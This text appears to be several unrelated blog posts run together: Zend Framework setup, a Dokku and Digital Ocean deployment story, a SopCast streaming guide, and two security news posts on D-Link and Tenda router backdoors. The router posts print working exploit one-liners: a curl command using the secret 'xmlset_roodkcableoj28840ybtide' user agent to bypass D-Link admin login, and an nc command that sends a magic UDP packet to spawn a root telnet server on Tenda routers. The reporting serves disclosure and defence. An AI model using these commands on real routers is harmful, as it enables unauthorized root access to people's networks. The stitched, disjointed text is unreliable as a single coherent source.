Then add a line to the config file (application/configs/application.ini). Since the library name won't be different between stages, I've put it in the base section (production):
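autoloadernamespaces.amz = "Amz_"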
1. I had to add something (it doesn't matter what) after autoloadernamespaces. If I had written 'autoloadernamespaces = "Amz_"', it would have yielded errors, since an array is expected. By adding the ".amz" you make autoloadernamespaces into an array.
2. Instead of just "Amz" as my class prefix, I used "Amz_". The reason is to avoid a prefix like "Amz111_" also being accepted for my classes.
You might remember that in the virtual host we set up in the previous post, we set the APPLICATION_ENV environment variable to "development". It comes into play here as well: APPLICATION_ENV decides which part of the config is loaded, so in our case that's the development section. When you later set up your production environment, you set the variable to "production" and it automatically uses your production config. This lets you run the same code in all environments without the hassle of copying and modifying ini files like in the old days.
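To make this concrete, here is a minimal application.ini sketch showing how the sections relate (the phpSettings lines are the stock ZF defaults, included only to illustrate an environment-specific override):

[production]
phpSettings.display_errors = 0
autoloadernamespaces.amz = "Amz_"

[development : production]
phpSettings.display_errors = 1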
My last infrastructure-related post was about our experience of using AppFog and eventually switching to Nodejitsu. But that was not the end. In short: for Likeastore we needed SSL support, and it turned out that SSL is only available on Nodejitsu's business plan, priced at 120 USD. That was simply too much for our small venture.
A long time ago I realized that constraints are good. This case just proved it. Looking for alternative options gave really nice results, which could easily be reused if you are looking for a simple deployment solution.
Heroku
Heroku is a good service. I might be mistaken, but it was probably Heroku that popularized "git-powered" deployments, where the whole deployment script looks like:
> git push heroku master
The service takes care of the rest: preparing the runtime, deploying the code, starting the web application, and so on. Besides that, Heroku open-sourced a lot of good stuff, including so-called buildpacks, ready-to-use scripts that can set up a dyno with all the runtime required to start an application there.
I never seriously used Heroku, though. What I dislike is the pricing. Also, the feedback from people I asked about their satisfaction with Heroku was not very positive (arguably). We needed a more lightweight, easy-to-change setup.
Digital Ocean
Digital Ocean is a very fast-growing cloud-computing service. It is not a PaaS (platform as a service) like Heroku; it is rather an IaaS (infrastructure as a service). They are notable for a few major things:
Ease of use – the flow from registration to first droplet creation is smooth and clear.
Regions – machines can be fired up in both the US and the EU, ideal for us.
But again, Digital Ocean is nothing more than great infrastructure. Herding the server is all up to you. I personally was really afraid of the prospect of setting up nginx, configuring firewalls, load balancing, and so on, and that kept me from looking closely at Digital Ocean. Once you are used to the deployment procedures of Nodejitsu and Heroku, it is a real pain to deploy an app by FTP again and do everything manually.
But by lucky chance I noticed the Dokku project, and that turned out to be something really great; I will explain why below.
Dokku & Docker
So, Dokku is simply an amazing hack (or, more correctly, a combination of different hacks) by Jeff Lindsay. Some initial facts:
Written in shell script, currently around 100 lines of code
Based on Docker
Provides Heroku-like deployment experience
Community-driven
Dokku can be installed on an Ubuntu 13 machine and turns it into a Heroku-like server. You push your code there, and Dokku fires up a new Docker container, deploys the code into it, starts the application, configures nginx, and sets up environment variables and SSL.
By the way, at the time I first looked at Dokku, it was missing exactly those two features: ENV variables and SSL. Without them it was not acceptable for me. Constraints again, but that gave me the opportunity to contribute to the project, and eventually I submitted both features.
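Once those features landed, managing an app's environment is a one-liner on the Dokku host; if I recall the CLI correctly, it looks something like this ("collector" is our app name):

> dokku config:set collector NODE_ENV=production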
Dokku is a very interesting project, first of all because it is based on the trendy Docker. Docker is an alternative to virtual-machine-based deployment. Deploying on virtual boxes is the de facto standard now, and Docker is about to change that. The guys from dotCloud open-sourced a solution that runs isolated processes (containers), which are like lightweight virtual machines. You can install Docker on an Ubuntu server and then use it to host any kind of application or database.
Docker can turn an Ubuntu server into a PaaS, and Dokku provides a great "interface" for it.
Each piece of Dokku is very interesting indeed, and I hope to blog more about it. Dokku also uses Heroku buildpacks, which makes it feel like you are dealing with Heroku rather than your own setup.
Putting Things Together
Digital Ocean and Dokku make a perfect match. As I said above, Digital Ocean is something you can start with really quickly. So what we did was simply fire up a $10 Ubuntu 13 server and install Dokku on it. In total it took about 7 minutes. I won't bother you with instructions, since you can find plenty on the internet; besides, DO + Dokku is a kind of Apple product that doesn't require instructions.
The first impression was simply amazing. You have everything under control and feel great with "git-powered" deployments. After that successful try, the machine became our staging server, and I fired up another one for production.
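There is no magic behind the deployment targets: each environment is just a git remote pointing at the Dokku host (the hostnames below are placeholders for ours):

> git remote add deploy-staging dokku@stage.likeastore.com:collector
> git remote add deploy-production dokku@likeastore.com:collector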
Now, when we develop features and want to show each other something or test it, we just need to do the following:
> git push deploy-staging feature:master
Counting objects: 7, done.
Delta compression using up to 8 threads.
Compressing objects: 100% (4/4), done.
Writing objects: 100% (4/4), 445 bytes | 0 bytes/s, done.
Total 4 (delta 2), reused 0 (delta 0)
remote: -----> Building collector ...
remote: Node.js app detected
remote: -----> Resolving engine versions
remote: Using Node.js version: 0.10.15
remote: Using npm version: 1.2.30
remote: -----> Fetching Node.js binaries
remote: -----> Vendoring node into slug
remote: -----> Installing dependencies with npm
remote: npm WARN package.json likeastore-collector@0.0.2-21 No repository field.
remote: npm http GET https://registry.npmjs.org/mongojs
remote: npm http GET https://registry.npmjs.org/underscore
...
remote: =====> Application deployed:
remote: http://stage-collector.likeastore.com
When we are ready to release:
> git push deploy-production master
Counting objects: 7, done.
Delta compression using up to 8 threads.
...
remote: =====> Application deployed:
remote: http://collector.likeastore.com
It’s fast and it’s pretty reliable.
In conclusion, I would say that the combination of Digital Ocean and Dokku was a clear win in getting Likeastore released.
A number of D-Link routers reportedly have an issue that makes them susceptible to unauthorized backdoor access.
The researcher Craig Heffner, who specializes in embedded device hacking, demonstrated the presence of a backdoor in some D-Link routers that allows an attacker to access the administration web interface of the devices without any authentication and view or change their settings.
He found the backdoor in firmware v1.13 for the DIR-100 revA. Craig located and extracted the SquashFS file system, then loaded the firmware's web server binary (/bin/webs) into IDA.
Looking at the string listing, Craig's attention was caught by a modified version of thttpd, thttpd-alphanetworks/2.23, which implements the router's administrative interface.
The modification was written by Alphanetworks, a spin-off of D-Link. Analyzing it, Craig found many custom functions whose names start with the prefix "alpha", including alpha_auth_check.
The function is invoked during HTTP request parsing to handle authentication.
"We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request."
Analyzing the parameters passed to the function, the researcher was able to reconstruct the authentication flow: the function parses the requested URL and checks whether it contains the string "graphic/" or "public/". These are sub-directories under the device's web directory, and if the requested URL contains one of them, the request is passed through without authentication.
Craig found another intriguing detail: by changing the user agent in a web browser to "xmlset_roodkcableoj28840ybtide", a user could bypass the security on the device and get online or control the higher functions of the router.
Craig searched Google for "xmlset_roodkcableoj28840ybtide" and found traces of it in only a single Russian forum post from a few years ago. Going deeper into his analysis, Craig was able to piece together the body of alpha_auth_check:
int alpha_auth_check(struct http_request_t *request)
{
    // URLs under graphic/ or public/, or the backdoor user agent,
    // skip authentication entirely
    if(strstr(request->url, "graphic/") ||
       strstr(request->url, "public/") ||
       strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
    {
        return AUTH_OK;
    }
    // These arguments are probably user/pass or session info
    if(check_login(request->0xC, request->0xE0) != 0)
    {
        return AUTH_OK;
    }
    return AUTH_FAIL;
}
Try reading the string xmlset_roodkcableoj28840ybtide backwards: it reads "edit by 04882 joel backdoor". Very cool.
The worrying part about this vulnerability is how it can be exploited. Anyone connected to the router, whether it's through Ethernet or Wi-Fi, can simply set their browser's user agent string to a specific codeword and then attempt to access the web configuration panel.
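To put it concretely, the whole "exploit" fits in one line; with curl the user agent is overridden via -A (192.168.0.1 stands in for the router's address):

curl -A "xmlset_roodkcableoj28840ybtide" http://192.168.0.1/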
Craig extended his discovery to many other D-Link devices affected by the same backdoor: he searched the entire Internet with Shodan for "thttpd-alphanetworks/2.23", the modified version of thttpd.
After a series of tests, Craig concluded that the following D-Link devices are likely affected:
• DIR-100
• DI-524
• DI-524UP
• DI-604S
• DI-604UP
• DI-604+
• TM-G5240
The researcher also discovered that Planex routers based on the same firmware are affected by the flaw:
• BRL-04UR
• BRL-04CW
D-Link has confirmed that the flaw exists, but has refused to provide comment on how it was inserted into its products. 'D-Link will be releasing firmware updates to address the security vulnerabilities in affected D-Link routers by the end of October,' a company spokesperson explained.
Very intriguing... What do you think about it?
Update (1:43 PM Wednesday, October 16, 2013 GMT): An Nmap script is now available for automated scanning and identification of the vulnerable D-Link routers, covering models DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240.
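A scan of a suspect device would look something like the following (the script name, http-dlink-backdoor, is the one it was merged under, as best I can tell; the target address is a placeholder):

nmap -p 80 --script http-dlink-backdoor 192.168.0.1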
Last week Craig Heffner, who specializes in embedded device hacking, exposed a serious backdoor in a number of D-Link routers that allows unauthorized access.
Recently he published another piece of research, titled 'From China, With Love', showing that D-Link is not the only vendor that puts backdoors in its products. According to him, the China-based networking device and equipment manufacturer Tenda Technology (www.tenda.cn) has also added potential backdoors to its wireless routers.
He unpacked the firmware update, located the httpd binary, and found that the manufacturer is using a substantially modified GoAhead server.
These routers are protected with standard Wi-Fi Protected Setup (WPS) and a WPA encryption key, but by sending a UDP packet containing a special string, an attacker can still take over the router.
The routers contain a flaw in the httpd component: the MfgThread() function spawns a backdoor service that listens for incoming messages containing commands to execute. An attacker with access to the local network can use it to execute arbitrary commands with root privileges.
He observed that an attacker just needs to send the following command to UDP port 7329 in order to spawn a telnet server and gain root access (the payload below is reconstructed; 192.168.0.1 stands in for the router's LAN address):
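# reconstruction of the magic packet; adjust the IP to your router
echo -ne "w302r_mfg\x00x/bin/busybox telnetd" | nc -q 5 -u 192.168.0.1 7329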
Where, "w302r_mfg" is the magic string to get access via backdoor.
Some of the vulnerable routers are W302R and W330R as well as re-branded models, such as the Medialink MWN-WAPR150N. Other Tenda routers are also possibly affected. They all use the same “w302r_mfg” magic packet string.
An Nmap NSE script to test for the backdoored routers, tenda-backdoor.nse, is also available for penetration testing.
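Assuming the script file has been downloaded locally, a test run would look something like this (the target address is a placeholder):

nmap -sU -p 7329 --script ./tenda-backdoor.nse 192.168.0.1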
How to watch P2P stream using SopCast in Ubuntu: an Idiot Guide
13 December 2009
Another step in eliminating Windows completely from my laptop. The last thing left is a complete astronomy software package (camera control, autoguiding, image processing).
OK, here it is:
1) If you're using Ubuntu 9.10, the instructions on this page may save you a bit of working time.
2) If you're not that lucky (I have 8.04, for instance, and am for some reason too reluctant to change), get sp-auth from this page. Download it to your home directory, e.g. /home/you
3) Extract the tarball. Open a terminal and type (don't forget to press ENTER afterwards): tar xvfz sp-auth.tgz
4) Change the working directory: cd sp-auth
5) Now try opening a channel from the command line, e.g.: ./sp-sc-auth sop://broker.sopcast.com:3912/69850 3908 8908 > /dev/null & (Get the sop:// URL from the channel you want to view. The number 8908 is the port you'll use later; 3908 is rather arbitrary, I don't know what it is exactly.)
6) If there's an error message saying something about "libstdc++...", you probably need libstdc++5. Type: sudo apt-get install libstdc++5-3.3-dev from the command line. Retry step 5; you should see no more error messages.
7) Open VLC. From the menu: Applications –> Sound & Video –> VLC media player, or type vlc from the command line.
8) In VLC, open a network stream. From the menu: File –> Open Network Stream, or press Ctrl+N.
9) Select the “HTTP/HTTPS/FTP/MMS” radio button, and type: localhost:8908/tv.asf in the text box. Press OK. You should be able to watch the channel now.
10) If there’s no sound coming out, check vlc settings, make sure that ALSA audio output module is selected. In vlc, edit the settings from the menu: Settings –> Preferences, or press Ctrl+S. Select the “Advanced Options” check box, and look at the options Audio –> Output modules. Select “ALSA audio output” from the drop-down menu. Restart vlc.
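For reference, once everything is installed the whole flow should boil down to this (same channel URL and ports as above):

tar xvfz sp-auth.tgz
cd sp-auth
./sp-sc-auth sop://broker.sopcast.com:3912/69850 3908 8908 > /dev/null &
vlc http://localhost:8908/tv.asf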
This page provides another set of instructions; if you follow it, you won't need VLC to play the stream. Setup time will be more or less the same, though, I think.
The stock rewrite setup doesn't work too well in the DevCloud. I would get log errors like:
[Tue Feb 07 13:06:33 2012] [error] [client 192.168.0.254] Request exceeded the limit of 10 internal redirects due to probable configuration error. Use ‘LimitInternalRecursion’ to increase the limit if necessary. Use ‘LogLevel debug’ to get a backtrace.
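A likely culprit is a rewrite rule whose output matches the rule again. The stock ZF1 public/.htaccess below avoids the loop by passing existing files through untouched; if yours differs, it is worth a try:

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -s [OR]
RewriteCond %{REQUEST_FILENAME} -l [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^.*$ - [NC,L]
RewriteRule ^.*$ index.php [NC,L]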
Zend Framework (ZF) is a powerful web application framework sponsored by Zend Technologies. ZF has lots of features: support for multiple database systems, a nice caching system, a "loosely coupled" architecture (meaning components have minimal dependency on each other), and it is enterprise-ready, as advertised.
Requirements
This tutorial assumes you have a LAMP stack installed on your Ubuntu VPS, but it should work equally well on other Linux distros with a LAMP stack. We will be installing Zend Framework 1, as it is more widely used and has more educational material available.
Install PHP5:
apt-get install php5 php5-common
Install MySQL server:
apt-get install mysql-server
Install Zend Framework:
apt-get install zend-framework
Install phpMyAdmin:
apt-get install phpmyadmin
See this link for more detail: Install phpmyadmin and secure it. ZF requires mod_rewrite to be enabled, which you can do with this command:
a2enmod rewrite
Installation
After installing via apt-get, we need to point the PHP interpreter at the Zend library by editing php.ini, located in /etc/php5/apache2. Assuming the package placed the library under /usr/share/php (the default for the Ubuntu package), the include_path line should look something like this:
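; assuming the Ubuntu package put the library under /usr/share/php
include_path = ".:/usr/share/php"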
Creating Your First Application

We will begin by creating our first project. Change into the /var/www directory.
cd /var/www
Let's create our first project, named ZendApp. There are a few steps left before the project runs, so don't worry if you don't see anything yet when you visit http://youripaddress
zf create project ZendApp
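The generated skeleton looks roughly like this (a sketch; minor files omitted):

ZendApp/
  application/
    configs/
      application.ini
    controllers/
    models/
    views/
  library/
  public/
    .htaccess
    index.php
  tests/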
This command creates the project files for "ZendApp". Of the subdirectories it creates, "public" is the one our web server should point to. We arrange this by making it the default web root. Go to the Apache settings directory that holds the currently enabled sites:
cd /etc/apache2/sites-enabled
You can optionally back up your default settings file with this command:
cp 000-default 000-default.bck
Now change the contents of "000-default":
nano 000-default
and replace its contents with the lines below:
<VirtualHost *:80>
ServerName localhost
DocumentRoot /var/www/ZendApp/public
SetEnv APPLICATION_ENV "development"
<Directory /var/www/ZendApp/public>
DirectoryIndex index.php
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>
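Finally, restart Apache so the new settings take effect:

service apache2 restart

Visiting http://youripaddress should now show the Zend Framework welcome page.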